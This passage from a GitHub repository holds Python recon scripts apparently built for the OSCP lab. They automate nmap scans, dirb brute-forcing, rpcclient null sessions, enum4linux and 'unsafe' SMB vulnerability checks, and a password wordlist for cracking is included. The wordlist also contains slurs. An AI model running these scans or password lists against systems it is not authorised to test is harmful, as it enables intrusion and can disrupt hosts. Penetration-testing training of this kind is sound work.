45 | 46 | @fn_timer 47 | def dirbEnum(prot, ip_address, port): 48 | found = [] 49 | url = "%s://%s:%s" % (prot, ip_address, port) 50 | print "INFO: Starting dirb scan for " + url 51 | agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)" 52 | for folder in folders: 53 | for filename in os.listdir(folder): 54 | outfile = "-o %s/%s_%s_dirb_%s" % (reconf.exampth, ip_address, port, filename) 55 | DIRBSCAN = "dirb %s %s/%s %s -S -r" % (url, folder, filename, outfile) 56 | try: 57 | results = subprocess.check_output(DIRBSCAN, shell=True) 58 | resultarr = results.split("\n") 59 | except: 60 | pass 61 | 62 | def vpnstatus(): 63 | return int(os.popen('ifconfig tap0 | wc -l').read().split()[0]) 64 | 65 | if __name__=='__main__': 66 | # Check if VPN to the Offsec lab is up 67 | if not vpnstatus() > 1: 68 | print "You forgot to connect to the lab" 69 | sys.exit() 70 | 71 | print "[*] Parsing %s/%s.nmap" % (reconf.exampth, ip_address) 72 | 73 | fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address) 74 | print "\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap) 75 | with open(fnmap, 'r') as searchfile: 76 | for line in searchfile: 77 | if 'open' in line and re.search('http|ssl/http|https', line): 78 | #print line 79 | port = re.split('\s+', line)[0] 80 | port = re.split('\/', port)[0].strip() 81 | prot = re.split('\s+', line)[2].strip() 82 | prot = re.split('\?', prot)[0].strip() 83 | if 'ssl/http' in line: prot = 'https' 84 | 85 | dirbEnum(prot, ip_address, port) 86 | -------------------------------------------------------------------------------- /passwords.txt: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 123456 5 | password 6 | pa55Word 7 | passw0rd! 8 | pa55W0rd! 9 | 12345678 10 | qwerty 11 | 123456789 12 | 12345 13 | 1234 14 | 111111 15 | 1234567 16 | dragon 17 | 123123 18 | baseball 19 | abc123 20 | football 21 | monkey 22 | letmein 23 | l3tm31n 24 | letME1n123 25 | 696969 26 | shadow 27 | master 28 | 666666 29 | qwertyuiop 30 | 123321 31 | mustang 32 | 1234567890 33 | michael 34 | 654321 35 | pussy 36 | superman 37 | 1qaz2wsx 38 | 7777777 39 | fuckyou 40 | 121212 41 | 000000 42 | qazwsx 43 | 123qwe 44 | killer 45 | trustno1 46 | jordan 47 | jennifer 48 | zxcvbnm 49 | asdfgh 50 | hunter 51 | buster 52 | soccer 53 | harley 54 | batman 55 | andrew 56 | tigger 57 | sunshine 58 | iloveyou 59 | fuckme 60 | 2000 61 | charlie 62 | robert 63 | thomas 64 | hockey 65 | ranger 66 | daniel 67 | starwars 68 | klaster 69 | 112233 70 | george 71 | asshole 72 | computer 73 | michelle 74 | jessica 75 | pepper 76 | 1111 77 | zxcvbn 78 | 555555 79 | 11111111 80 | 131313 81 | freedom 82 | 777777 83 | pass 84 | fuck 85 | maggie 86 | 159753 87 | aaaaaa 88 | ginger 89 | princess 90 | joshua 91 | cheese 92 | amanda 93 | summer 94 | love 95 | ashley 96 | 6969 97 | nicole 98 | chelsea 99 | biteme 100 | matthew 101 | access 102 | yankees 103 | 987654321 104 | dallas 105 | austin 106 | thunder 107 | taylor 108 | matrix 109 | william 110 | corvette 111 | hello 112 | martin 113 | heather 114 | secret 115 | fucker 116 | merlin 117 | diamond 118 | 1234qwer 119 | gfhjkm 120 | hammer 121 | silver 122 | 222222 123 | 88888888 124 | anthony 125 | justin 126 | test 127 | bailey 128 | q1w2e3r4t5 129 | patrick 130 | internet 131 | scooter 132 | orange 133 | 11111 134 | golfer 135 | cookie 136 | richard 137 | samantha 138 | bigdog 139 | guitar 140 | jackson 141 | whatever 142 | mickey 143 | chicken 144 | sparky 145 | snoopy 146 | maverick 147 | phoenix 148 | camaro 149 | sexy 150 | peanut 151 | morgan 152 | welcome 153 | falcon 154 | cowboy 155 | ferrari 156 | samsung 157 | andrea 158 | smokey 159 | steelers 160 | joseph 161 | mercedes 162 | dakota 163 | arsenal 164 | eagles 165 | melissa 166 | boomer 167 | booboo 168 | spider 169 | nascar 170 | monster 171 | tigers 172 | yellow 173 | xxxxxx 174 | 123123123 175 | gateway 176 | marina 177 | diablo 178 | bulldog 179 | qwer1234 180 | compaq 181 | purple 182 | hardcore 183 | banana 184 | junior 185 | hannah 186 | 123654 187 | porsche 188 | lakers 189 | iceman 190 | money 191 | cowboys 192 | 987654 193 | london 194 | tennis 195 | 999999 196 | ncc1701 197 | coffee 198 | scooby 199 | 0000 200 | miller 201 | boston 202 | q1w2e3r4 203 | fuckoff 204 | brandon 205 | yamaha 206 | chester 207 | mother 208 | forever 209 | johnny 210 | edward 211 | 333333 212 | oliver 213 | redsox 214 | player 215 | nikita 216 | knight 217 | fender 218 | barney 219 | midnight 220 | please 221 | brandy 222 | chicago 223 | badboy 224 | iwantu 225 | slayer 226 | rangers 227 | charles 228 | angel 229 | flower 230 | bigdaddy 231 | rabbit 232 | wizard 233 | bigdick 234 | jasper 235 | enter 236 | rachel 237 | chris 238 | steven 239 | winner 240 | adidas 241 | victoria 242 | natasha 243 | 1q2w3e4r 244 | jasmine 245 | winter 246 | prince 247 | panties 248 | marine 249 | ghbdtn 250 | fishing 251 | cocacola 252 | casper 253 | james 254 | 232323 255 | raiders 256 | 888888 257 | marlboro 258 | gandalf 259 | asdfasdf 260 | crystal 261 | 87654321 262 | 12344321 263 | sexsex 264 | golden 265 | blowme 266 | bigtits 267 | 8675309 268 | panther 269 | lauren 270 | angela 271 | bitch 272 | spanky 273 | thx1138 274 | angels 275 | madison 276 | winston 277 | shannon 278 | mike 279 | toyota 280 | blowjob 281 | jordan23 282 | canada 283 | sophie 284 | Password 285 | apples 286 | dick 287 | tiger 288 | razz 289 | 123abc 290 | pokemon 291 | qazxsw 292 | 55555 293 | qwaszx 294 | muffin 295 | johnson 296 | murphy 297 | cooper 298 | jonathan 299 | liverpoo 300 | david 301 | danielle 302 | 159357 303 | jackie 304 | 1990 305 | 123456a 306 | 789456 307 | turtle 308 | horny 309 | abcd1234 310 | scorpion 311 | qazwsxedc 312 | 101010 313 | butter 314 | carlos 315 | password1 316 | dennis 317 | slipknot 318 | qwerty123 319 | booger 320 | asdf 321 | 1991 322 | black 323 | startrek 324 | 12341234 325 | cameron 326 | newyork 327 | rainbow 328 | nathan 329 | john 330 | 1992 331 | rocket 332 | viking 333 | redskins 334 | butthead 335 | asdfghjkl 336 | 1212 337 | sierra 338 | peaches 339 | gemini 340 | doctor 341 | wilson 342 | sandra 343 | helpme 344 | qwertyui 345 | victor 346 | florida 347 | dolphin 348 | pookie 349 | captain 350 | tucker 351 | blue 352 | liverpool 353 | theman 354 | bandit 355 | dolphins 356 | maddog 357 | packers 358 | jaguar 359 | lovers 360 | nicholas 361 | united 362 | tiffany 363 | maxwell 364 | zzzzzz 365 | nirvana 366 | jeremy 367 | suckit 368 | stupid 369 | porn 370 | monica 371 | elephant 372 | giants 373 | jackass 374 | hotdog 375 | rosebud 376 | success 377 | debbie 378 | mountain 379 | 444444 380 | xxxxxxxx 381 | warrior 382 | 1q2w3e4r5t 383 | q1w2e3 384 | 123456q 385 | albert 386 | metallic 387 | lucky 388 | azerty 389 | 7777 390 | shithead 391 | alex 392 | bond007 393 | alexis 394 | 1111111 395 | samson 396 | 5150 397 | willie 398 | scorpio 399 | bonnie 400 | gators 401 | benjamin 402 | voodoo 403 | driver 404 | dexter 405 | 2112 406 | jason 407 | calvin 408 | freddy 409 | 212121 410 | creative 411 | 12345a 412 | sydney 413 | rush2112 414 | 1989 415 | asdfghjk 416 | red123 417 | bubba 418 | 4815162342 419 | passw0rd 420 | trouble 421 | gunner 422 | happy 423 | fucking 424 | gordon 425 | legend 426 | jessie 427 | stella 428 | qwert 429 | eminem 430 | arthur 431 | apple 432 | nissan 433 | bullshit 434 | bear 435 | america 436 | 1qazxsw2 437 | nothing 438 | parker 439 | 4444 440 | rebecca 441 | qweqwe 442 | garfield 443 | 01012011 444 | beavis 445 | 69696969 446 | jack 447 | asdasd 448 | december 449 | 2222 450 | 102030 451 | 252525 452 | 11223344 453 | magic 454 | apollo 455 | skippy 456 | 315475 457 | girls 458 | kitten 459 | golf 460 | copper 461 | braves 462 | shelby 463 | godzilla 464 | beaver 465 | fred 466 | tomcat 467 | august 468 | buddy 469 | airborne 470 | 1993 471 | 1988 472 | lifehack 473 | qqqqqq 474 | brooklyn 475 | animal 476 | platinum 477 | phantom 478 | online 479 | xavier 480 | darkness 481 | blink182 482 | power 483 | fish 484 | green 485 | 789456123 486 | voyager 487 | police 488 | travis 489 | 12qwaszx 490 | heaven 491 | snowball 492 | lover 493 | abcdef 494 | 00000 495 | pakistan 496 | 007007 497 | walter 498 | playboy 499 | blazer 500 | cricket 501 | sniper 502 | hooters 503 | donkey 504 | willow 505 | loveme 506 | saturn 507 | therock 508 | redwings 509 | bigboy 510 | pumpkin 511 | trinity 512 | williams 513 | tits 514 | nintendo 515 | digital 516 | destiny 517 | topgun 518 | runner 519 | marvin 520 | guinness 521 | chance 522 | bubbles 523 | testing 524 | fire 525 | november 526 | minecraft 527 | asdf1234 528 | lasvegas 529 | sergey 530 | broncos 531 | cartman 532 | private 533 | celtic 534 | birdie 535 | little 536 | cassie 537 | babygirl 538 | donald 539 | beatles 540 | 1313 541 | dickhead 542 | family 543 | 12121212 544 | school 545 | louise 546 | gabriel 547 | eclipse 548 | fluffy 549 | 147258369 550 | lol123 551 | explorer 552 | beer 553 | nelson 554 | flyers 555 | spencer 556 | scott 557 | lovely 558 | gibson 559 | doggie 560 | cherry 561 | andrey 562 | snickers 563 | buffalo 564 | pantera 565 | metallica 566 | member 567 | carter 568 | qwertyu 569 | peter 570 | alexande 571 | steve 572 | bronco 573 | paradise 574 | goober 575 | 5555 576 | samuel 577 | montana 578 | mexico 579 | dreams 580 | michigan 581 | cock 582 | carolina 583 | yankee 584 | friends 585 | magnum 586 | surfer 587 | poopoo 588 | maximus 589 | genius 590 | cool 591 | vampire 592 | lacrosse 593 | asd123 594 | aaaa 595 | christin 596 | kimberly 597 | speedy 598 | sharon 599 | carmen 600 | 111222 601 | kristina 602 | sammy 603 | racing 604 | ou812 605 | sabrina 606 | horses 607 | 0987654321 608 | qwerty1 609 | pimpin 610 | baby 611 | stalker 612 | enigma 613 | 147147 614 | star 615 | poohbear 616 | boobies 617 | 147258 618 | simple 619 | bollocks 620 | 12345q 621 | marcus 622 | brian 623 | 1987 624 | qweasdzxc 625 | drowssap 626 | hahaha 627 | caroline 628 | barbara 629 | dave 630 | viper 631 | drummer 632 | action 633 | einstein 634 | bitches 635 | genesis 636 | hello1 637 | scotty 638 | friend 639 | forest 640 | 010203 641 | hotrod 642 | google 643 | vanessa 644 | spitfire 645 | badger 646 | maryjane 647 | friday 648 | alaska 649 | 1232323q 650 | tester 651 | jester 652 | jake 653 | champion 654 | billy 655 | 147852 656 | rock 657 | hawaii 658 | badass 659 | chevy 660 | 420420 661 | walker 662 | stephen 663 | eagle1 664 | bill 665 | 1986 666 | october 667 | gregory 668 | svetlana 669 | pamela 670 | 1984 671 | music 672 | shorty 673 | westside 674 | stanley 675 | diesel 676 | courtney 677 | 242424 678 | kevin 679 | porno 680 | hitman 681 | boobs 682 | mark 683 | 12345qwert 684 | reddog 685 | frank 686 | qwe123 687 | popcorn 688 | patricia 689 | aaaaaaaa 690 | 1969 691 | teresa 692 | mozart 693 | buddha 694 | anderson 695 | paul 696 | melanie 697 | abcdefg 698 | security 699 | lucky1 700 | lizard 701 | denise 702 | 3333 703 | a12345 704 | 123789 705 | ruslan 706 | stargate 707 | simpsons 708 | scarface 709 | eagle 710 | 123456789a 711 | thumper 712 | olivia 713 | naruto 714 | 1234554321 715 | general 716 | cherokee 717 | a123456 718 | vincent 719 | Usuckballz1 720 | spooky 721 | qweasd 722 | cumshot 723 | free 724 | frankie 725 | douglas 726 | death 727 | 1980 728 | loveyou 729 | kitty 730 | kelly 731 | veronica 732 | suzuki 733 | semperfi 734 | penguin 735 | mercury 736 | liberty 737 | spirit 738 | scotland 739 | natalie 740 | marley 741 | vikings 742 | system 743 | sucker 744 | king 745 | allison 746 | marshall 747 | 1979 748 | 098765 749 | qwerty12 750 | hummer 751 | adrian 752 | 1985 753 | vfhbyf 754 | sandman 755 | rocky 756 | leslie 757 | antonio 758 | 98765432 759 | 4321 760 | softball 761 | passion 762 | mnbvcxz 763 | bastard 764 | passport 765 | horney 766 | rascal 767 | howard 768 | franklin 769 | bigred 770 | assman 771 | alexander 772 | homer 773 | redrum 774 | jupiter 775 | claudia 776 | 55555555 777 | 141414 778 | zaq12wsx 779 | shit 780 | patches 781 | nigger 782 | cunt 783 | raider 784 | infinity 785 | andre 786 | 54321 787 | galore 788 | college 789 | russia 790 | kawasaki 791 | bishop 792 | 77777777 793 | vladimir 794 | money1 795 | freeuser 796 | wildcats 797 | francis 798 | disney 799 | budlight 800 | brittany 801 | 1994 802 | 00000000 803 | sweet 804 | oksana 805 | honda 806 | domino 807 | bulldogs 808 | brutus 809 | swordfis 810 | norman 811 | monday 812 | jimmy 813 | ironman 814 | ford 815 | fantasy 816 | 9999 817 | 7654321 818 | PASSWORD 819 | hentai 820 | duncan 821 | cougar 822 | 1977 823 | jeffrey 824 | house 825 | dancer 826 | brooke 827 | timothy 828 | super 829 | marines 830 | justice 831 | digger 832 | connor 833 | patriots 834 | karina 835 | 202020 836 | molly 837 | everton 838 | tinker 839 | alicia 840 | rasdzv3 841 | poop 842 | pearljam 843 | stinky 844 | naughty 845 | colorado 846 | 123123a 847 | water 848 | test123 849 | ncc1701d 850 | motorola 851 | ireland 852 | asdfg 853 | slut 854 | matt 855 | houston 856 | boogie 857 | zombie 858 | accord 859 | vision 860 | bradley 861 | reggie 862 | kermit 863 | froggy 864 | ducati 865 | avalon 866 | 6666 867 | 9379992 868 | sarah 869 | saints 870 | logitech 871 | chopper 872 | 852456 873 | simpson 874 | madonna 875 | juventus 876 | claire 877 | 159951 878 | zachary 879 | yfnfif 880 | wolverin 881 | warcraft 882 | hello123 883 | extreme 884 | penis 885 | peekaboo 886 | fireman 887 | eugene 888 | brenda 889 | 123654789 890 | russell 891 | panthers 892 | georgia 893 | smith 894 | skyline 895 | jesus 896 | elizabet 897 | spiderma 898 | smooth 899 | pirate 900 | empire 901 | bullet 902 | 8888 903 | virginia 904 | valentin 905 | psycho 906 | predator 907 | arizona 908 | 134679 909 | mitchell 910 | alyssa 911 | vegeta 912 | titanic 913 | christ 914 | goblue 915 | fylhtq 916 | wolf 917 | mmmmmm 918 | kirill 919 | indian 920 | hiphop 921 | baxter 922 | awesome 923 | people 924 | danger 925 | roland 926 | mookie 927 | 741852963 928 | 1111111111 929 | dreamer 930 | bambam 931 | arnold 932 | 1981 933 | skipper 934 | serega 935 | rolltide 936 | elvis 937 | changeme 938 | simon 939 | 1q2w3e 940 | lovelove 941 | fktrcfylh 942 | denver 943 | tommy 944 | mine 945 | loverboy 946 | hobbes 947 | happy1 948 | alison 949 | nemesis 950 | chevelle 951 | cardinal 952 | burton 953 | wanker 954 | picard 955 | 151515 956 | tweety 957 | michael1 958 | 147852369 959 | 12312 960 | xxxx 961 | windows 962 | turkey 963 | 456789 964 | 1974 965 | vfrcbv 966 | sublime 967 | 1975 968 | galina 969 | bobby 970 | newport 971 | manutd 972 | daddy 973 | american 974 | alexandr 975 | 1966 976 | victory 977 | rooster 978 | qqq111 979 | madmax 980 | electric 981 | bigcock 982 | a1b2c3 983 | wolfpack 984 | spring 985 | phpbb 986 | lalala 987 | suckme 988 | spiderman 989 | eric 990 | darkside 991 | classic 992 | raptor 993 | 123456789q 994 | hendrix 995 | 1982 996 | wombat 997 | avatar 998 | alpha 999 | zxc123 1000 | crazy 1001 | hard 1002 | england 1003 | brazil 1004 | 1978 1005 | 01011980 1006 | wildcat 1007 | polina 1008 | freepass 1009 | aliceisnice 1010 | -------------------------------------------------------------------------------- /recon.conf: -------------------------------------------------------------------------------- 1 | [hosts] 2 | iprange: 192.168.31.200-205 3 | fulliprng: 192.168.31.200-254 4 | opth: /data/lab/results/exam/ipList.gnmap 5 | olst: /data/lab/results/exam/ipList.txt 6 | 7 | [base] 8 | rootpth: /data 9 | labpath: /data/lab 10 | 11 | [paths] 12 | basepth: /data/lab 13 | rsltpth: /data/lab/results 14 | exampth: /data/lab/results/exam 15 | nmappth: /data/lab/results/exam/nmap 16 | 17 | [nmapscripts] 18 | httpnse: http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-screenshot-html 19 | nsepth: /usr/share/nmap/scripts 20 | 21 | [wordlist] 22 | wordlst: /usr/share/dirb/wordlists 23 | shortlst: indexes.txt,small.txt 24 | moderlst: indexes.txt,common.txt,small.txt,mutations_common.txt,extensions_common.txt 25 | 26 | [vuln] 27 | vulns: /usr/share/dirb/wordlists/vulns 28 | 29 | [crack] 30 | usrlst: /data/lab/scripts/oscp/users.txt 31 | pwdlst: /data/lab/scripts/oscp/passwords.txt 32 | fzzlst: /data/lab/scripts/oscp/users.txt 33 | 34 | [useragent] 35 | uagnt1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko 36 | uagnt2: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 37 | uagnt3: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US) 38 | uagnt4: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1) 39 | uagnt5: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 40 | [nastycode] 41 | iframe1: 42 | -------------------------------------------------------------------------------- /reconf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import ConfigParser 4 | 5 | def set_vars(): 6 | global iprange 7 | global fulliprng 8 | global rootpth 9 | global labpath 10 | global rsltpth 11 | global exampth 12 | global nmappth 13 | global httpnse 14 | global wordlst 15 | global moderlst 16 | global shortlst 17 | global vulns 18 | global usrlst 19 | global pwdlst 20 | global fzzlst 21 | global opth 22 | global olst 23 | global nsepth 24 | global uagnt1 25 | global uagnt2 26 | global uagnt3 27 | global uagnt4 28 | global uagnt5 29 | global iframe1 30 | 31 | config = ConfigParser.ConfigParser() 32 | config.read('recon.conf') 33 | 34 | iprange = config.get('hosts','iprange') 35 | fulliprng = config.get('hosts','fulliprng') 36 | opth = config.get('hosts','opth') 37 | olst = config.get('hosts','olst') 38 | 39 | rootpth = config.get('base','rootpth') 40 | labpath = config.get('base','labpath') 41 | 42 | basepth = config.get('paths','basepth') 43 | rsltpth = config.get('paths','rsltpth') 44 | exampth = config.get('paths','exampth') 45 | nmappth = config.get('paths','nmappth') 46 | wordlst = config.get('wordlist','wordlst') 47 | shortlst = config.get('wordlist','shortlst') 48 | moderlst = config.get('wordlist','moderlst') 49 | vulns = config.get('vuln','vulns') 50 | 51 | httpnse = config.get('nmapscripts','httpnse') 52 | nsepth = config.get('nmapscripts','nsepth') 53 | 54 | usrlst = config.get('crack','usrlst') 55 | pwdlst = config.get('crack','pwdlst') 56 | fzzlst = config.get('crack','fzzlst') 57 | 58 | uagnt1 = config.get('useragent','uagnt1') 59 | uagnt2 = config.get('useragent','uagnt2') 60 | uagnt3 = config.get('useragent','uagnt3') 61 | uagnt4 = config.get('useragent','uagnt4') 62 | uagnt5 = config.get('useragent','uagnt5') 63 | 64 | iframe1 = config.get('nastycode','iframe1') 65 | 66 | set_vars() 67 | -------------------------------------------------------------------------------- /reconf.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/crsftw/oscp/3c6009f013016b63dcf9bffe020a8844455355c8/reconf.pyc -------------------------------------------------------------------------------- /reconscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import time 8 | import nmap 9 | import re 10 | import reconf 11 | from reconf import * 12 | import time 13 | from functools import wraps 14 | 15 | def hms(seconds): 16 | m, s = divmod(seconds, 60) 17 | h, m = divmod(m, 60) 18 | return("%d:%02d:%02d:" % (h, m, s)) 19 | 20 | def fn_timer(function): 21 | @wraps(function) 22 | def function_timer(*args, **kwargs): 23 | t0 = time.time() 24 | result = function(*args, **kwargs) 25 | t1 = time.time() 26 | print ("Total time running %s: %s" % 27 | (function.func_name, hms(t1-t0)) 28 | ) 29 | return result 30 | return function_timer 31 | 32 | def multProc(targetin, scanip, port): 33 | jobs = [] 34 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 35 | jobs.append(p) 36 | p.start() 37 | return 38 | 39 | def TCPScan(ip_address): 40 | ip_address = ip_address.strip() 41 | TCPSCAN = "nmap -sV -vv -Pn -O -sS -T4 -p- -oA '%s/%s' %s" % (reconf.exampth, ip_address, ip_address) 42 | print "\033[1;33m[*]\033[0;m Running general TCP nmap scans for " + ip_address 43 | subprocess.check_output(TCPSCAN, shell=True) 44 | 45 | def UDPScan(ip_address): 46 | ip_address = ip_address.strip() 47 | UDPSCAN = "nmap -sV -vv -Pn -O -sU -T4 --top-ports 20 -oA '%s/%sU' %s" % (reconf.exampth, ip_address, ip_address) 48 | print "\033[1;33m[*]\033[0;m Running general UDP nmap scans for " + ip_address 49 | subprocess.check_output(UDPSCAN, shell=True) 50 | 51 | def dualScan(ip_address): 52 | TCPScan(ip_address) 53 | #UDPScan(ip_address) 54 | 55 | @fn_timer 56 | def deepScan(ip_address): 57 | DSCAN = "./deepscan.py %s" % (ip_address) 58 | print "\033[1;33m[*]\033[0;m Digging deeper into " + ip_address 59 | subprocess.call(DSCAN, shell=True) 60 | 61 | def chkfolders(): 62 | dpths = [reconf.rootpth,reconf.labpath,reconf.rsltpth,reconf.exampth,reconf.nmappth] 63 | for dpth in dpths: 64 | if not os.path.exists(dpth): 65 | os.makedirs(dpth) 66 | 67 | def createList(ipadr): 68 | nm = nmap.PortScanner() 69 | args = "-sP -PS -n -oG %s " % (reconf.opth) 70 | nm.scan(ipadr,arguments=args) 71 | fo = open(reconf.olst,"w") 72 | with open(reconf.opth) as input: 73 | for line in input: 74 | line = line.split(" ") 75 | if re.match('[a-zA-Z]',line[1]) is None: 76 | fo.write("%s\n" % (line[1])) 77 | fo.close() 78 | 79 | def vpnstatus(): 80 | return int(os.popen('ifconfig tap0 | wc -l').read().split()[0]) 81 | 82 | if __name__=='__main__': 83 | # Check if VPN to the Offsec lab is up 84 | if not vpnstatus() > 1: 85 | print "You forgot to connect to the lab" 86 | sys.exit() 87 | 88 | # Make sure the folders exists 89 | chkfolders() 90 | 91 | # Create list of active IPs 92 | createList(reconf.iprange) 93 | 94 | print "Intel Gathering" 95 | jobs = [] 96 | f = open(reconf.olst, 'r') 97 | for scanip in f: 98 | p = multiprocessing.Process(target=dualScan, args=(scanip,)) 99 | jobs.append(p) 100 | f.close() 101 | 102 | for j in jobs: 103 | j.start() 104 | 105 | for j in jobs: 106 | j.join() 107 | print "%s.exitcode = %s" % (j.name, j.exitcode) 108 | 109 | ''' 110 | print "Deeper Dive" 111 | jobs = [] 112 | f = open(reconf.olst, 'r') 113 | for scanip in f: 114 | p = multiprocessing.Process(target=deepScan, args=(scanip,)) 115 | jobs.append(p) 116 | f.close() 117 | 118 | for j in jobs: 119 | j.start() 120 | 121 | for j in jobs: 122 | j.join() 123 | print "%s.exitcode = %s" % (j.name, j.exitcode) 124 | ''' 125 | -------------------------------------------------------------------------------- /rpcrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import sys 4 | import reconf 5 | from reconf import * 6 | 7 | if len(sys.argv) != 2: 8 | print "Usage: rpcrecon.py " 9 | sys.exit(0) 10 | 11 | ip_address = sys.argv[1] 12 | 13 | RPC = "rpcclient -U %s %s" % ("", ip_address) 14 | results = subprocess.check_output(RPC, shell=True).strip() 15 | 16 | if results != "": 17 | print results 18 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import time 8 | import re 9 | import hashlib 10 | import pip 11 | installed_packages = pip.get_installed_distributions() 12 | import reconf 13 | from reconf import * 14 | 15 | def chkfolders(): 16 | dpths = [reconf.rsltpth,reconf.exampth,reconf.nmappth] 17 | for dpth in dpths: 18 | if not os.path.exists(dpth): 19 | print "[!] %s folder is missing, creating it now..." % (dpth) 20 | os.makedirs(dpth) 21 | else: 22 | print "[+] We're okay, %s folder exists" % (dpth) 23 | 24 | def upnsedb(url): 25 | NSE = "wget -c %s -P %s" % (url, reconf.nsepth) 26 | print "[!] Fetching %s " % (nsefile) 27 | subprocess.call(NSE, shell=True) 28 | print "[+] Updating Nmap database with %s " % (nsefile) 29 | UPNSEDB = "nmap --script-updatedb" 30 | subprocess.call(UPNSEDB, shell=True) 31 | 32 | def install(package): 33 | pip.main(['install', package]) 34 | 35 | def hashfile(afile, hasher, blocksize=65536): 36 | buf = afile.read(blocksize) 37 | while len(buf) > 0: 38 | hasher.update(buf) 39 | buf = afile.read(blocksize) 40 | return hasher.digest() 41 | 42 | if __name__=='__main__': 43 | print "[*] Installing missing NSE scripts..." 44 | nsearray = ['http-screenshot-html.nse','smb-check-vulns.nse'] 45 | for nsefile in nsearray: 46 | nsescript = "%s/%s" % (reconf.nsepth, nsefile) 47 | if not os.path.isfile(nsescript): 48 | if re.search('http-screenshot-html.nse', nsefile): 49 | upnsedb('https://raw.githubusercontent.com/afxdub/http-screenshot-html/master/http-screenshot-html.nse') 50 | if re.search('smb-check-vulns.nse', nsefile): 51 | upnsedb('https://svn.nmap.org/nmap-exp/scriptsuggest/scripts/smb-check-vulns.nse') 52 | else: 53 | print "[+] %s is already installed" % (nsefile) 54 | 55 | FN = "wkhtmltoimage" 56 | TAR = "wkhtmltox-0.12.3_linux-generic-amd64.tar.xz" 57 | URL = "wget -c http://download.gna.org/wkhtmltopdf/0.12/0.12.3/%s" % (TAR) 58 | EXT = "wkhtmltox/bin/%s" % (FN) 59 | BIN = "/usr/local/bin" 60 | BFN = "%s/%s" % (BIN, FN) 61 | TXZ = "tar -Jxf %s" % (TAR) 62 | CXZ = "cp %s %s" % (EXT, BIN) 63 | print "[*] Checking for the installation of %s..." % (FN) 64 | if not os.path.isfile(BFN): 65 | if os.path.isfile(TAR): 66 | print "[+] Downloading wkhtmltoimage..." 67 | filename = subprocess.call(URL, shell=True) 68 | if os.path.isfile(TAR): 69 | print "[+] Extracting %s file %s to %s..." % (TAR, EXT, BIN) 70 | subprocess.call(TXZ, shell=True) 71 | subprocess.call(CXZ, shell=True) 72 | if not os.path.isfile(BFN): 73 | print "[!] %s not found in %s" % (FN, BIN) 74 | else: 75 | print "[+] %s is install to %s" % (FN, BIN) 76 | else: 77 | print "[+] We're good: %s is installed" % (FN) 78 | 79 | print "[*] Checking for the necessary folders..." 80 | chkfolders() 81 | 82 | print "[*] Checking if the required modules are installed..." 83 | pkgs = ['ftputil', 'pywinrm', 'xsser', 'python-libnmap', 'python-nmap', 'easyprocess'] 84 | fipkgs = [package.project_name for package in installed_packages] 85 | for pkgname in pkgs: 86 | if pkgname in fipkgs: 87 | print "[+] The %s module is installed..." % (pkgname) 88 | else: 89 | print "[!] The %s module hasn't been installed yet..." % (pkgname) 90 | print "[!] Installing %s module now..." % (pkgname) 91 | install(pkgname) 92 | 93 | TAR = "nmap_nse_vulscan-2.0.tar.gz" 94 | URL = "wget -c http://www.computec.ch/projekte/vulscan/download/%s" % (TAR) 95 | VPT = "%s/vulscan" % (reconf.nsepth) 96 | TXZ = "tar -xzvf %s -C %s" % (TAR, reconf.nsepth) 97 | CXZ = "cp %s/vulscan.nse %s" % (VPT, reconf.nsepth) 98 | print "[*] Checking if vulnscan is installed..." 99 | if not os.path.isdir(VPT): 100 | if not os.path.isfile(TAR): 101 | print "[+] Downloading %s.." % (TAR) 102 | subprocess.call(URL, shell=True) 103 | print "[+] Extracting %s to %s..." % (TAR, reconf.nsepth) 104 | subprocess.call(TXZ, shell=True) 105 | subprocess.call(CXZ, shell=True) 106 | UPNSEDB = "nmap --script-updatedb" 107 | subprocess.call(UPNSEDB, shell=True) 108 | else: 109 | print "[+] We're good: vulscan is installed" 110 | -------------------------------------------------------------------------------- /smbrecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import os 4 | import sys 5 | import reconf 6 | from reconf import * 7 | 8 | if len(sys.argv) != 2: 9 | print "Usage: smbrecon.py " 10 | sys.exit(0) 11 | 12 | ip_address = sys.argv[1] 13 | 14 | def cat(fname): 15 | fn = open(fname, 'r') 16 | fc = fn.read() 17 | print fc 18 | fn.close() 19 | 20 | NMAPS = "nmap -sV -Pn -n --script=smb-check-vulns --script-args=unsafe=1 -oA %s/%s_smb %s" % (reconf.exampth, ip_address, ip_address) 21 | results = subprocess.check_output(NMAPS, shell=True) 22 | if results != "": 23 | print results 24 | 25 | E4L = "enum4linux -a %s" % (ip_address) 26 | results = subprocess.check_output(E4L, shell=True) 27 | if results != "": 28 | ofile = "%s/%s_enum4linux.txt" % (reconf.exampth,ip_address) 29 | try: 30 | with open(ofile, 'a') as file: 31 | file.write(results) 32 | except: 33 | print "ERROR: Couldn't write to %s" % (ofile) 34 | 35 | if os.path.isfile(ofile): 36 | cat(ofile) 37 | else: 38 | print "%s doesn't exists" % (ofile) 39 | -------------------------------------------------------------------------------- /smtprecon.py: 